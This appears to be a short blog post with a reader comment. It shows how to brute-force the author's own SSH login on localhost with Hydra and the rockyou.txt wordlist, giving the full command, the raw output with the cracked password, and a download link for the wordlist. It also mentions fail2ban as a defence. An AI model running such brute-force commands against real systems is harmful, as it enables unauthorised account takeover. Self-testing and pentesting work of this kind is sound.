The hydra brute forcing program allows a user to attack a login trying many passwords until the correct login information is discovered. I have tried this on localhost and I managed to crack the password for my SSH login on my laptop. I used rockyou.txt downloaded from this website and I had to add my password to this file so that it would be found. Using as large a wordlist as you can will be a good idea. And this was the command used.
hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh |
This allowed me to crack the SSH password in no time at all.
jason@darkstar:~/Downloads$ hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-07 14:38:32 [DATA] max 5 tasks per 1 server, overall 5 tasks, 14344401 login tries (l:1/p:14344401), ~573776 tries per task [DATA] attacking service ssh on port 22 [ATTEMPT] target localhost - login "jason" - pass "123456" - 1 of 14344401 [child 0] [ATTEMPT] target localhost - login "jason" - pass "12345" - 2 of 14344401 [child 1] [ATTEMPT] target localhost - login "jason" - pass "302c64&*(" - 3 of 14344401 [child 2] [ATTEMPT] target localhost - login "jason" - pass "ff302c64FFG" - 4 of 14344401 [child 3] [ATTEMPT] target localhost - login "jason" - pass "302c64&*(FFG" - 5 of 14344401 [child 4] [22][ssh] host: 127.0.0.1 login: jason password: 302c64&*( [STATUS] attack finished for localhost (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-07 14:38:34 |
This is therefore a good way to test SSH security. But the use of SSH host keys would make this harder. if fail2ban was installed and configured,then this would negate the brute force attacks by blocking repeat offenders in iptables. This is a valid tool for pentesting though.
Download rockyou.txt: https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz.
It is available in Kali Linux under /usr/share/wordlists, but I will upload it to my website if you wish.
Can you upload rockyou.txt somewhere? It is unavailable from that site…